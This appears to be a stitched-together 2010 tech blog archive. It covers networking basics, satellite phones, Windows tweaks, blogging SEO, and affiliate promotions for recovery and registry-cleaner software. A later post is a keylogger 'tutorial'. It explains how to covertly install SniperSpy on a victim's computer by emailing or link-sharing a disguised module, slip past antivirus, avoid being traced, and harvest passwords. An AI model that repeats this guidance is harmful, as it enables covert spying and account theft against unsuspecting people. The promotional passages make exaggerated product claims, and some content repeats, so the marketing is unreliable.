20100730

NETWORKING BASIC

What is a Network?

A network is basically a set of two or more articles that are linked so the computers can share resources, such as printers, software, and internet connections. Networked computers can also share files without having to transfer data using a disk or data key. And users of networked computers can also communicate electronically without use of the internet.

Computers within a network can be linked several ways: though cables, telephone lines,
radio waves, satellites, or infrared beams. There are also three basic types of networks: Local Area Networks (LANs), Metropolitan Area Networks (MANs), and Wide Area Networks (WANs).

Local Area Networks

A Local Area Network (LAN) is basically a smaller network that's confined to a relatively small geographic area. LAN computers are rarely more than a mile apart. Examples of common LANs are networked computers within a writing lab, school, or building.

Within a LAN network, one computer is the file server. This means that it stores all software that controls the network, and it also stores the software that can be shared among computers in the network. The file server is the heart of the LAN.

The computers attached to the file server are called workstations. Workstations can be less powerful than the file server because they don't have to store as many files and applications as the file server, and they are not always on and working to keep the network up and running. However, workstations may also have additional software stored on their hard drives. Most LANS are connected using cables.

Metropolitan Area Networks

A Metropolitan Area Network (MAN) connect 2 or more LANs together but does not span outside the boundaries of a city, town, or metropolitan area. Within this type of network is also the Campus Area Network (CAN), which is generally smaller than a MAN, connecting LANs within a limited functional area, like a college campus, military base, or industrial complex.

Wide Area Networks

Wide Area Networks connect larger geographic areas. Often, smaller LANs are interconnected to form a large WAN. For instance, an office LAN in Los Angeles may be connected to office LANs for the same company in New York, Toronto, Paris, and London to form a WAN spanning the whole company. The individual offices are no longer part of individual LANs, they are instead part of a worldwide WAN.

The connection of this type of network is complicated. WANs are normally connected using multiplexers connect local and metropolitan networks to global communications networks like the Internet.


JAi mAta di

NETWORKING BASIC

What is a Network?

A network is basically a set of two or more articles that are linked so the computers can share resources, such as printers, software, and internet connections. Networked computers can also share files without having to transfer data using a disk or data key. And users of networked computers can also communicate electronically without use of the internet.

Computers within a network can be linked several ways: though cables, telephone lines,
JAi mAta di

20100729

Satellite phone

Satellite phone (Inmarsat)

A satellite telephone, satellite phone, or satphone is a type of mobile phone that connects to orbiting satellites instead of terrestrial cell sites. Depending on the architecture of a particular system, coverage may include the entire Earth, or only specific regions.

The mobile equipment, also known as a terminal, varies widely. Early satellite phone handsets had a size and weight comparable to that of a late-1980s or early-1990s mobile phone, but usually with a large retractable antenna. More recent satellite phones are similar in size to a regular mobile phone while some prototype satellite phones have no distinguishable difference from an ordinary smartphone.[1][2] Satphones are popular on expeditions into remote areas where terrestrial cellular service is unavailable.

A fixed installation, such as one used aboard a ship, may include large, rugged, rack-mounted electronics, and a steerable microwave antenna on the mast that automatically tracks the overhead satellites. Smaller installations using VoIP over a two-way satellite broadband service such as BGAN or VSAT bring the costs within the reach of leisure vessel owners. Internet service Satellite phones have notoriously poor reception indoors, though it may be possible to get a consistent signal near a window or in the top floor of a building if the roof is sufficiently thin. The phones have connectors for external antennas that are often installed in vehicles and buildings. the systems also allow for the use of repeaters, much like terrestrial mobile phone systems.

In some countries such as Burma, possession of a satellite phone is illegal.[3][4] Their signals will usually bypass local telecoms systems, hindering censorship and wiretapping attempts. In Australia, residents of remote areas may apply for a government subsidy for a satellite phone.[5]


Satellite phone नेटवर्क

Geosynchronous satellites


Some satellite phones use satellites in geostationary orbit, which are meant to remain in a fixed position in the sky at all times. These systems can maintain near-continuous global coverage with only three or four satellites, reducing the launch costs. However the satellites used for these systems are very heavy (approx. 5000 kg) and therefore very expensive to build and launch. The satellites sit at an altitude of about 22,000 miles (35,000 km); a noticeable delay is present while making a phone call or using data services due to the large distances from their users. The amount of bandwidth available on these systems is substantially higher than that of the Low Earth Orbit (LEO) systems; all three active systems provide portable satellite Internet using laptop-sized terminals with speeds ranging from 60 kbits to 512 kbits per second (Kbps).

Another disadvantage of geostationary satellite systems is that in many areas—even where a large amount of open sky is present—the line-of-sight between the phone and the satellite is broken by obstacles such as steep hills and forest. The user will need to find an area with line-of-sight before being able to use the phone. This is not the case with LEO services: even if the signal is blocked by an obstacle, one can wait a few minutes until another satellite passes overhead. Although, a moving LEO may drop a call when line of sight is lost.

  • ACeS: This small regional operator provides voice and data services in East Asia using a single satellite.
  • Inmarsat: The oldest satellite phone operator, founded in 1979. It originally provided large fixed installations intended for use on ships, but has only recently started to enter the market of hand-held phones in a joint venture with ACeS. The company operates eleven satellites with another planned for launch in 2010. Coverage is available on most of the Earth's surface, notably excepting polar regions.
  • Thuraya: A system based in the UAE. Three satellites are currently in active service that provide coverage to the most of Eurasia, Africa and Australia. There is some degree of coverage overlap between adjacent satellites within the network.
  • MSAT / SkyTerra: An American satellite phone company that uses equipment similar to Inmarsat, but plans to launch a service using hand-held devices in the Americas similar to Thuraya's.
  • Terrestar: Satellite phone system for North America
  • ICO Global Communications: A satellite phone company which has launched a single geosynchronous satellite which is not yet in active service.

Low Earth orbit

LEO telephones utilizes LEO (low Earth orbit) satellite technology. The advantages include providing worldwide wireless coverage with no gaps. LEO satellites orbit the earth in high speed, low altitude orbits with an orbital time of 70–100 minutes, an altitude of 640 to 1120 kilometers (400 to 700 miles), and provide coverage cells of about (at a 100-minute orbital period) 2800 km in radius (about 1740 mi). Since the satellites are not geosynchronous, they must fly complete orbits. At least one satellite must have line-of-sight to every coverage area at all times to guarantee complete coverage. Depending on the positions of both the satellite and terrestrial user, a usable pass of an individual LEO satellite will typically last 4–15 minutes on average;[6] thus, a constellation of satellites is required to maintain coverage (as is done with Iridium, Globalstar, GPS, and others).

Two such systems, both based in the United States started up in the late 1990s but soon went into bankruptcy after they failed to gain the number of subscribers required to fund the large satellite launch costs. They are now operated by new owners who bought the assets for a fraction of their original cost and are now both planning to launch replacement constellations supporting higher bandwidth. Data speeds for current networks are between 2200 bit/s and 9600 bit/s using a satellite handset.

  • Globalstar: A network covering most of the world's landmass using 44 active satellites; however many areas are left without coverage since a satellite must be in range of an earth station. Satellites fly in an inclined orbit of 52 degrees; as such, polar regions cannot be covered. The network went into limited commercial service at the end of 1999 .
  • Iridium: A network operating 66 satellites in a polar orbit that claims coverage everywhere on the Earth's surface. Commercial service started in November 1998 and fell into bankruptcy soon after. Notably radio cross-links are used between satellites in order to relay data to the nearest satellite with a connection to an earth station.

Tracking

LEO systems have the ability to track a mobile unit's location using doppler shift calculations from the satellite.[7] However, this method can be inaccurate by tens of kilometers. On some Iridium hardware the coordinates can be extracted using AT commands, while recent Globalstar handsets will display them on the screen.[8]

Locations banning satellite phones

One-way services

Some satellite phone networks provide a one-way paging channel to alert users in poor coverage areas of an incoming call. When the alert is received on the satellite phone it must be taken to an area with better coverage before the call can be accepted.

Globalstar provides a one-way data uplink service, typically used for asset tracking.

Iridium operates a one-way pager service as well as the call alert feature.

Cost of a satellite phone

Satphones on display

While it is possible to obtain used handsets for the Thuraya, Iridium, and Globalstar networks for approximately US$200, the newest handsets are still quite expensive. The Iridium 9505A, although released in 2001, still sold in March 2010 for well over $1,000 USD new.[10][11][12] Since satellite phones are purpose-built for one particular network and cannot be switched to other networks, the price of handsets varies with the performance of the network. If a satellite phone provider encounters trouble with its network the handset prices will fall, then increase once new satellites are launched. Similarly, handset prices will increase when calling rates are reduced.

Among the most expensive satellite phones are BGAN terminals, often costing several thousand US dollars. However, these phones provide broadband Internet as well as voice communications. Satellite phones are sometimes subsidised by the provider if one signs a post-paid contract but subsidies are usually only a few hundred US dollars or less.

Since most satellite phones are built under license or the manufacturing of handsets is contracted out to OEMs, operators have a large influence over the selling price. Satellite networks operate under proprietary closed standards, making it difficult for manufacturers to independently make their own handsets.

Virtual country codes

Satellite phones are usually issued with numbers in a special country calling code.

Inmarsat satellite phones are issued with codes +870 through +874. In the past these codes have been allocated to different satellites but the codes +871 to +874 are due to be phased out at the end of 2008 leaving Inmarsat users with the same country code regardless of which satellite their terminal is registered with.

Low earth orbit systems including some of the defunct ones have been allocated number ranges in the International Telecommunications Union's Global Mobile Satellite System virtual country code +881. Iridium satellite phones are issued with codes +881 6 and +881 7. Globalstar, although allocated +881 8 and +881 9 use U.S. telephone numbers except for service resellers located in Brazil which use the +881 range.

Smaller regional satellite phone networks are allocated numbers in the +882 code designated for "international networks" which is not used exclusively for satellite phone networks.

Calling cost

The cost of making voice calls from a satellite phone varies from around $0.15 to $2 per minute, while calling them from landlines and regular mobile phones is more expensive. Costs for data transmissions (particularly broadband data) can be much higher. Rates from landlines and mobile phones range from $3 to $14 per minute with Iridium, Thuraya[13] and INMARSAT being some of the most expensive networks to call. The receiver of the call pays nothing, unless he is being called via a special reverse-charge service.

Making calls between different satellite phone networks is often similarly expensive, with calling rates of up to $15 per minute.

Calls from satellite phones to landlines are usually around $0.80 to $1.50 per minute unless special offers are used. Such promotions are usually bound to a particular geographic area where traffic is low. Globalstar is currently offering unlimited calling plans until 2010.

Most satellite phone networks have pre-paid plans, with vouchers ranging from $10 to $5,000.

Use in disaster response

Most mobile telephone networks operate close to capacity during normal times and large spikes in call volumes caused by widespread emergencies often overload the system just when it is needed the most. Examples reported in the media where this have occurred include the September 11 attacks, the Hawaiian earthquake, the 2003 Northeast blackouts, Hurricane Katrina,[14] the 2007 Minnesota bridge collapse and the 2010 Chilean earthquake.

Also, terrestrial cell antennas and networks can be damaged by natural disasters. Satellite telephony can avoid this problem and be critical in natural disaster communications. Satellite phone networks themselves are prone to congestion as satellites and spot beams cover a very large area with relatively few voice channels.


jai mAta di

What is a Network?

A network consists of two or more computers that are linked in order to share resources (such as printers and CDs), exchange files, or allow electronic communications. The computers on a network may be linked through cables, telephone lines, radio waves, satellites, or infrared light beams.

The two basic types of networks include:

You may also see references to a Metropolitan Area Networks (MAN), a Wireless LAN (WLAN), or a Wireless WAN (WWAN).

Local Area Network

A Local Area Network (LAN) is a network that is confined to a relatively small area. It is generally limited to a geographic area such as a writing lab, school, or building. Rarely are LAN computers more than a mile apart.

In a typical LAN configuration, one computer is designated as the file server. It stores all of the software that controls the network, as well as the software that can be shared by the computers attached to the network. Computers connected to the file server are called workstations. The workstations can be less powerful than the file server, and they may have additional software on their hard drives. On many LANs, cables are used to connect the network interface cards in each computer; other LANs may be wireless. See the Topology, Cabling, and Hardware sections of this tutorial for more information on the configuration of a LAN.

Wide Area Network

Wide Area Networks (WANs) connect larger geographic areas, such as Florida, the United States, or the world. Dedicated transoceanic cabling or satellite uplinks may be used to connect this type of network.

Using a WAN, schools in Florida can communicate with places like Tokyo in a matter of minutes, without paying enormous phone bills. A WAN is complicated. It uses multiplexers to connect local and metropolitan networks to global communications networks like the Internet. To users, however, a WAN will not appear to be much different than a LAN.

Advantages of Installing a School Network

  • Speed. Networks provide a very rapid method for sharing and transferring files. Without a network, files are shared by copying them to memory cards or discs, then carrying or sending the discs from one computer to another. This method of transferring files (referred to as sneaker-net) can be very time-consuming.
  • Cost. Networkable versions of many popular software programs are available at considerable savings when compared to buying individually licensed copies.
  • Security. Files and programs on a network can be designated as "copy inhibit," so that you do not have to worry about illegal copying of programs. Also, passwords can be established for specific directories to restrict access to authorized users.
  • Centralized Software Management. One of the greatest benefits of installing a network at a school is the fact that all of the software can be loaded on one computer (the file server). This eliminates that need to spend time and energy installing updates and tracking files on independent computers throughout the building.
  • Resource Sharing. Sharing resources is another advantage of school networks. Most schools cannot afford enough laser printers, fax machines, modems, scanners, and CD players for each computer. However, if these or similar peripherals are added to a network, they can be shared by many users.
  • Electronic Mail. The presence of a network provides the hardware necessary to install an e-mail system. E-mail aids in personal and professional communication for all school personnel, and it facilitates the dissemination of general information to the entire school staff. Electronic mail on a LAN can enable students to communicate with teachers and peers at their own school. If the LAN is connected to the Internet, students can communicate with others throughout the world.
  • Flexible Access. School networks allow students to access their files from computers throughout the school. Students can begin an assignment in their classroom, save part of it on a public access area of the network, then go to the media center after school to finish their work. Students can also work cooperatively through the network.
  • Workgroup Computing. Collaborative software allows many users to work on a document or project concurrently. For example, educators located at various schools within a county could simultaneously contribute their ideas about new curriculum standards to the same document, spreadsheets, or website.

Disadvantages of Installing a School Network

  • Expensive to Install. Although a network will generally save money over time, the initial costs of installation can be prohibitive. Cables, network cards, routers, and software are expensive, and the installation may require the services of a technician.
  • Requires Administrative Time. Proper maintenance of a network requires considerable time and expertise. Many schools have installed a network, only to find that they did not budget for the necessary administrative support.
  • File Server May Fail. Although a file server is no more susceptible to failure than any other computer, when the files server "goes down," the entire network may come to a halt. When this happens, the entire school may lose access to necessary programs and files.
  • Cables May Break. The Topology chapter presents information about the various configurations of cables. Some of the configurations are designed to minimize the inconvenience of a broken cable; with other configurations, one broken cable can stop the entire network.
  • Must Monitor Security Issues. Wireless networks are becoming increasingly common; however, security can be an issue with wireless networks.

jai mAta di

20100710

How to Recover Deleted Files from Windows and Mac

How to Recover Deleted Files

Have you accidentally deleted your files from the Hard disk? Do you desperately want to recover them back? Well you need not panic! It is possible to recover the deleted files back from the hard disk (even after you have Shift+Deleted) provided you act as soon as you realize that the files are deleted and use the best deleted files recovery software. In this post you will find a detailed information on how to recover the deleted files from your Windows PC or Mac.

Today there exists hundreds of data recovery tools and softwares on the market which boast to recover 100% of all the deleted files back in the original condition. But in reality most of these softwares are neither effective nor capable of recovering your files back. So it is very much necessary to make the right choice of the file recovery software in order to recover deleted files back in the original condition. We recommend the following softwares to recover the deleted files

1. Stellar Phoenix Data Recovery (for Windows)

2. Stellar Phoenix Mac Data Recovery (for Mac)

Stellar Phoenix is one of the best company specializing in deleted files recovery services and solutions since 1993. Stellar’s Data Recovery Solutions encompasses a wide range of software for almost any data loss situation ranging from accidental formats to virus attacks to software malfunctions. Hence Stellar provides the best tools to recover deleted files with over 1,000,000 satisfied customers across 137 countries.

How the File Deletion Process Works?

When you delete a file from your computer (or even from the recycle bin) the file is not actually deleted. Unlike what most people think, the file is not permanantly deleted or dropped from your hard disk. Let’s take an example of a book containing 50 pages. Suppose when you delete the page 25, assume that only the entry in the index which points to the page 25 is deleted and not actually the page 25 itself. Likewise when you delete a file from your hard disk, only the pointer which points to this file is removed and not actually the file itself. This file still exists intact and is 100% possible to recover it back in the original condition. In this condition the file becomes invisible and hence appears to have deleted.

What are the Chances of Recovering my Files Back?

Since the operating system doesn’t immediately re-use the space from the deleted files, it is most certainly possible to recover the deleted files back in 100% original condition. It may take up a very long time for those files to be completely deleted since the modern hard disks have ample capacity. Hence the chances are too less that the space from the deleted files are re-used immediately. So, it is really worth to try out the file recovery softwares like Stellar Data Recovery for Windows or Stellar Data Recover for Mac. Some files are reported to have recovered even after years of it’s deletion. However for the best results, it is recommended that you use the file recovery software as immediately as possible to recover your files.

Recovering the Deleted Files

In order to recover the deleted files all you need to do is perform a scan (search) for the deleted files using a File Recovery Software. Please be informed that there is no manual way to recover the deleted files. The Phoenix Data Recovery software performs a thorough scanning of the hard disk sector by sector and will locate the existence of deleted files to restore them back in the original condition. It is the only software that supports 185 popular file types including Windows NT Registry, JPEG, MP4, GIF, BMP and MS Word files. The software offers rich graphical support and incorporates advanced scanning methods to completely scan and recover deleted files from your hard drive. With this you can

  • Recover FAT16, FAT32, VFAT, NTFS, and NTFS5 file system partitions
  • Recover deleted emails
  • Recover deleted documents
  • Recover deleted photos
  • Recover deleted music
  • Formatted Hard-Drive recovery
  • Recover files from USB Drives, CDs, DVDs and memory cards
  • Recover almost all the camera format files

Visit the following links for more information on Stellar Data Recovery

1. Stellar Phoenix Data Recovery (for Windows)

2. Stellar Phoenix Mac Data Recovery (for Mac)

jai mAta di

How to Repair Registry of Windows PC

This article explains how to inspect and repair registry errors to improve the performance of your PC. If you are a Windows user then you will most probably be aware of the fact that the registry gets corrupted over time resulting in an overall decreased performance of your computer. At times registry errors can also make your PC to freeze down and hang up every now and then causing a serious annoyance to the user. At this point, the registry needs a serious repair to bring your PC back to it’s life. Well before I tell you how to repair the registry lets see what causes registry to get corrupted.

Registry errors may occur due to installing too many applications/softwares from time to time without verifying the publishers. This may create invalid entries in the registry hive leading to errors. With the Internet boom and the era of freeware with free downloads, people often install programs from untrusted sources which results in serious damage to the registry. Since the registry is a crucial component of the Windows operating system, damage to this registry can cause system performance to drop down considerably.

How to Repair the Registry?

The best and the easiest way to repair your registry is by using a Registry Repair Tool (Registry Cleaner) which will automatically scan the registry to find invalid entries and will repair it by removing the errors with in no time. A registry cleaner is the simple and safest solution to repair registry and bring your PC back to it’s life without the need to re-install the Windows. We recommend the following registry cleaner to repair the Windows registry

Perfect Optimizer is one of the best and award winning registry cleaner that repairs registry to avoid PC errors such as unwanted shutdown, freezing, crashing and more. Perfect optimizer will

  • Repair registry and increases your PC performance by upto 70%
  • Repair registry to fix DLL errors and invalid shortcuts
  • Free up virtual memory to avoid error messages
  • Performs Defragmentation and Compression of the registry
  • Repair registry to fix blue screen errors, system crashes, startup errors and more…

Visit Perfect Optimizer Homepage for more information on this program.

Can I Manually Repair the Registry?

Windows registry has a very complex structure with hundreds of thousands of entries embedded in it. A corrupt registry may contain thousands of invalid entries and errors in it and hence it is impractical and almost impossible to manually inspect, find and repair those errors. Also manual registry repair involves serious risk and can lead to a total system break down if done improperly. Except you are a highly experienced Windows user or a Windows expert, users are not encouraged to tamper with the registry.

Hence using a registry repair tool is the safest and easiest way to repair the registry and improve the overall performance of your PC. Registry repair tools will not only repair the registry but also maintains it’s health in a good condition so as to avoid any future damage to it. It is recommended that you periodically (daily or weekly) perform registry scans using these tools to repair the errors as and when they come up and keep your PC’s health at it’s best. Repair the registry and make your PC blazing fast like never before!


jai mAta di

How to Change the Logon Screen Background in Windows 7

How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background.

1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.

2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or 1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image as backgroundDefault.jpg.

3. You will need to copy this image to

C:\Windows\system32\oobe\info\backgrounds

You will need to create that path if it does not already exist on your computer.

4. Now open the Registry Editor (Start -> Run -> Type regedit) and navigate to the following key

HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\
LogonUI\Background

If Background does not exist rightclick LogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and select New and then DWORD and name it OEMBackground.

5. Double-click on OEMBackground and set the Value Data to 1.

6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.

I hope you like this trick. Just try out and give your feedback!


jai mAta di

Common Terminologies used in Internet Security

If you are a newbie in Internet security, you have come to the right place. The following is information on some common terms used in Internet security. So next time you don’t have to scratch your head when someone uses these.

Firewall – is a system that acts as a barrier between your computer network and the Internet. A firewall controls the flow of information according to security policies.

Hacker – can be anyone specializing in accessing computer based systems for illegal purposes or just for the fun of it.

IP spoofing – is an attempt to access your system by pretending like another system. This is done by setting up a system with an IP address that you normally trust.

Sniffing – is the spying on electronic transmissions to access data. This mostly occurs in privately owned LAN networks connected to the web.

Trojan horse – a program pretending like useful software, while its actual strategy is to access, steal or destroy user data and access authorization. Apart from destroying information, trojans can also create a backdoor on your system for stealing confidential information.

Virus – is a program that attaches itself to a program or file. This allows it to spread across networks and cause damage to software and hardware. To operate, viruses require the execution of the attached file.

Worm - A worm is almost similar to a virus, except that it doesn’t need the execution of any executable file to get activated. It can also replicate itself as it travels across networks.

Common Email Hacking Methods

Gone are the days when email hacking was a sophisticated art. Today any body can access hacking tips through the Internet and start hacking your yahoo or hotmail account. All that is needed is doing a search on google with keywords like “how to hack yahoo”, “hack yahoo messenger”, “hotmail hack program” etc. The following article is not an effort to teach you email hacking, but it has more to do with raising awareness on some common email hacking methods.

Hackers can install keylogger programs in the victim’s computer. This program can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden. After installation, the hacker will use a password and hot keys to enable the keylogger. He can then use the hot keys and password to access your key entry details.

A keylogger program is widely available on the internet.some of them are listed below

Win-Spy Monitor

Realtime Spy

SpyAgent Stealth

Spy Anywhere

For more information on keyloggers and it’s usage refer my post Hacking an email account.

Even if direct access to your computer is not possible, hackers can still install a key logger from a remote place and access your computer using Remote Administration Tools (RATs).

Another way of getting your password is the use of fake login pages that look exactly like the real one. So, beware of the web pages you visit. Also if you find your computer behaving oddly, there is a chance that some spy program is running. On such occasions it is better to try and remove the malware or reformat the entire hard disk.A detailed Email Hacking tutorial is discussed in the post Hacking an email account.

Walkthrough|Online Games Can I Change My Blogspot URL? Should I? Why? Why not?

You can always change your Blogspot blog URL by going to your blog's settings then to Publishing and from there you will be able to change the address of your blog, but however, you cannot change the .blogspot in it unless you host it in your own domain name like Carl Ocab and others did.


What would happen if you don't put your keyword in the URL of your blog?

Let's put it this way, for example, your keyword is "food" and the address/URL of your blog is http://ready2cook.blogspot.com and the title is
"Everyday Cooking". And, of course, your blog posts contains your keyword 'food'. It is very obvious that your keyword which is "food" is not present in the URL neither in the title of your blog. It is true that having your keyword in the URL and title of your blog is a plus in terms of optimizing for the search engine but, in the example above you will see that the words used in the URL title contain words that are relevant to your keyword: "food". What do you do with the 'food"? You cook it, right. What do you have with everyday cooking? Tires? Of course, not. You don't cook tires everyday, you can't eat it. It's rubber. You cook food. You get it? Hope you understand what I am trying to say here. G___gle is improving its algorithm everyday and it is bound to being close to perfection. That means he is looking not just at the keyword density of a blog or website but also at the relevance of every word in the blog to a certain keyword. But, still, having your keyword in the URL and blog title is a plus if you will be blogging for just one certain niche.

Now, let us look at Carl Ocab's site. His URL is carlocab.com, but his niche is 'make money online'. It is very obvious that the words
make, money and online is no way connected nor relevant to the words carlocab. I don't know much about Carl Ocab, but as far as I know, he's been blogging for about 2 to 3 years now and he made it to the top of search engines in the MMO niche with his catchy title "make money online with a 13 year old boy at home". It's not only Mr. Ocab here that has their name on their URL. Many bloggers changed the name of their URL and put their name in it. Perhaps, to build identity. But, the question is: if having your keyword in the URL and title of your blog is a plus, why are these people changing their URL to their own name? That is because the search engines are bound to be close to perfection as I mentioned earlier. These SEs are improving. They now analyze websites differently. If you are not a search engine friendly site, you will be outcast. If you optimize really good, they will suspect you for being a spam blog. Search Engines will label you as robot when you get too close to perfection like having perfect keyword density. Having your name or some words that is no way relevant to to what you blog in your URL makes you less spammy. That makes you more credible and chances are everything you write in your blog has bigger chances to getting indexed in the SERPs.

Hope I made it clear enough despite of my usual gramatical errors. hehe. Still, I must tell you that what I just told you is not a fool proof solution to get indexed in the serps. It is only based on my observations and experiments. I suggest you do your own experiments and observation and perhaps share what you will learn.

In my next post I will answer the rest of Xian's questions about blogging. I'm a little short of time. Got to go.

How to Become a Hacker

How to Become a Hacker

Most of us are very curious to learn Hacking and want to become a Hacker, but don’t know where to start. If you are in the same situation, then this is the right place for you.

Everyday I get a lot of emails where people ask me – How to Become a Hacker?. In fact this question is not easy to answer because, hacking is not an art that can be mastered overnight. It requires knowledge, skills, creativity, dedication and of course TIME. Everyone can become a Hacker provided they learn it from the basics. So if you wanna become a hacker, then all you need is a good source that will teach you hacking from the basics.

What skills do I need to Become a Hacker?

There is no magic to become a Hacker, but like anything else that is worthwhile it takes dedication, a willingness to learn. It is most important to have a good knowledge of topics such as Operating system and it’s working, Computer networks, Computer security and of course Programming. It’s not possible to become a hacker overnight. All you need is a good source to start from the basics.

What is the best way to Become a Hacker?

The best way to become a Hacker is to start from the basics. You have to master the basics to build a strong foundation. And once this is done you’ll be in a position to explore new ideas and start thinking like a Hacker.

There exists tons of books on the market that teach you Hacking but unfortunately, it requires a set of pre-established skills and knowledge to understand the concepts explained in the book. Also these are not meant the for the beginners who doesn’t know anything about hacking. I have found an excellent Book for Beginners. This book is the first step to fulfil your dream to become a Hacker. Yes, this is the right source for the beginners who are interested to learn hacking from the basics. The good thing about this book is, any one can understand the concepts presented without the need for any prior knowledge. It’s called

Hacker's Underground Handbook

Learn Hacking

This book will take you from the core to the top. It will tell you how to hack in simple steps. Everything is presented in a simple and effective manner. It’s a great source for the beginner who want to become a Hacker. This will install a Hacker’s Mindset on you.

The following skills are uncovered in this book

1. You will learn all the hacker underground tricks and learn to apply them in real world situations.

2. You will be put into a hacker mindset and learn to think like a Hacker.

3. By learning how a hacker thinks and acts, you will be able to protect yourself from future hack attacks.

4. You will acquire knowledge nonexistent to 99.9% of the people in the world!

5. This Underground handbook may get you interested in pursuing a career as an Ethical Hacker.

This book is of great value for all those who have a dream to become a Hacker.

So what are you waiting for? Go grab your copy now from the following link


Wait… This is not the end. Rather it is just the beginning of your journey to become a hacker. To become a hacker all you need is dedication and hard work. I wish you all the best for your future success.

How to use Keyloggers – Detailed Tutorial and FAQs

Here is a DETAILED tutorial which contains every possible information that you need to know about keyloggers which includes how to use it, how it works etc.
WARNING: I highly recommend that you read this post completely since every single piece of information is important.

I know most of you are new to the concept of keyloggers. For some of you, this might be the first time you heard about the term “keylogger”. So to give you a clear picture and make you understand better I would like to take up this post in the form of FAQs (Frequently Asked Questions). Here we go…

1. What is a Keylogger?

A keylogger (also called as spy software) is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password.

2. How Keylogger works?

Once the keylogger is installed on a PC, it starts operating in the background (stealth mode) and captures every keystroke of the victim on that PC. Let’s take up a small example: The victim goes to http://mail.yahoo.com and types his “username” and the “password” in the respective fields to login. The keylogger silently records these keystrokes and stores them in the logs. These logs when opened up shows the captured “username” and “password” and will also tell you that they were typed in the Yahoo login page. Thus the keylogger loads upon every startup, runs in the background and captures each and every keystroke.

3. How to install the keylogger?

A keylogger can be installed just like any other program. Just follow the screen instructions and you’re done.

4. Do I need any special knowledge to install and use the keylogger?

Absolutely NOT! Anyone with a basic computer knowledge can install and use the keylogger. It requires no special skills.

5. Once I install the keylogger can the victim come to know about it’s presence?

No. The victim will never come to know about the presence of the keylogger on his/her computer. This is because, once installed the keylogger will run in total stealth mode. Unlike other programs it will never show up in start-menu, start-up, program files, add/remove programs and task manager. So the victim can no way identify it’s presence on his/her PC.

6. Can I be traced back if I install the keylogger on some other computer?

No, it’s almost impossible to trace back to you for installing the keylogger on other’s PC.

7. Which keylogger is the best?

Today there exists hundreds of keyloggers on the market and most of them are no more than a scam. So I tested some of the top keyloggers and conclude that the following is the best one.

8. How SniperSpy works?

I will try to explain the working of Sniperspy in simple steps.

1. After you purchase Sniperspy, you’ll be able to create the installation module using easy set-up program. You need to email this module to the remote user as an attachment.

2. When the remote user runs the module it’ll get installed silently and monitoring process will begin. The keystrokes are captured and uploaded to the SniperSpy servers continously.

3. You can login to your Sniperspy account (you get this after purchase) to see the logs which contains the password.

9. I don’t have physical access to the traget computer. Can I still use SniperSpy?

Yes you can. SniperSpy supports REMOTE INSTALLATION feature which allows you to remotely install the program on any PC even if you have no physical access to it. For remote installation all you need to do is just place the module (refer FAQ-8) in a .zip/.rar file and send it as an attachment to the target email address (for which you need the password).

10. Can I install SniperSpy on a local computer?

If you need to install to your local (current) computer instead of your remote computer, then the process is simple. Simply navigate to the folder in which you saved your module ( Refer FAQ-8). Double-click the module filename to execute it. Nothing will appear on the screen as the software is installed.

11. What if the antivirus block from sending it as an email attachment?

Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.fileden.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.

12. Why SniperSpy is the best?

  • SniperSpy supports REMOTE INSTALLATION feature. This feature is not present on most of the keyloggers.
  • SniperSpy is fully compatible with Windows 98/ME/2000/XP/Vista and bypasses ANY Firewall.
  • SniperSpy is more reliable than any other keylogger program. You need not rely on your email account to receive the logs. Instead you can just login to your online SniperSpy account to receive the logs.
  • SniperSpy captures full-size screenshots of the activities on the target PC.
  • Records BOTH sides of chats / IMs in Google Talk, Yahoo IM, Windows Live and more.
  • SniperSpy is more easy to install and requires no extra knowledge.
  • SniperSpy is recognized by BBC, CNN, CBS and other news networks. Hence it is reputed and trustworthy.

13. How safe is to use SniperSpy?

Sniperspy is completely safe to use since all the customer databases remain confidential and private. SniperSpy do not collect any information from your system other than the information required for the product’s successful operation. They will not contact you in any way unless you request assistance.

14. Is my online order 100% Safe and Secure?

Absolutely Yes! All the e-commerce transactions for SniperSpy is handled by Plimus – they are a trusted online retailer specializing in digitally delivered products. All your information remains private and secure. The safety and protection of your personal information is 100% guaranteed. So you can place your order for SniperSpy with no worries of scam!

SniperSpy is completely reliable, safe and best keylogger out there. It is really worth the price that you pay for it. I promise that you cannot get a better keylogger than this. So what are you waiting for? Go grab SniperSpy now!

How to Customize Start Menu Button in Windows 7

Win 7 Start MenuHave you ever wondered how to customize the start menu button in Windows 7? Well it is possible to spice up your copy of Windows 7 by giving a new look to the start menu button. Here is a detailed tutorial on how to do it. The following images shows a preview of how your start menu would look like before and after the customization process is done.

Default Start Menu Button

Win 7 Start Menu - Default

Customized Start Menu Button

Customized Win 7 Start Menu
Customized Win 7 Start Menu
Customized Win 7 Start Menu

Tools That You Need:

1. Resource Hacker

2. Custom Start Menu icons (images). It mush be of the size 54×162 with a .bmp extension. which looks something as follows

Start Menu Icon

They must be in the following order:

1st Image - When the button is not in use
2nd Image - When the mouse pointer is over the button
3rd Image - When the button is clicked

I have created a few customized buttons which are ready to use. You can download them from the following link.

Start Menu Buttons Download

Once you have all those resources ready, you can start the customization process as follows…

1. Take the ownership of the fileexplorer.exe“ which is located in the Windows Folder (Most likely in C:\Windows).

2. Open the Resource Hacker Tool.

3. Go to File menu and click on Open. Now load the file “explorer.exe” into the Resource Hacker.

4. Expand Bitmap branch in the left pane.

5. Now expand 6801 option, right-click on 1033 and select Replace Resource option.

6. A new window appears. Click on Open file with new bitmap button.

7. Navigate to the customized (.bmp) image, open it and click on Replace button.

8. Repeat steps 4 to 7 above for the options 6805 and 6809 as well.

Resource Hacker

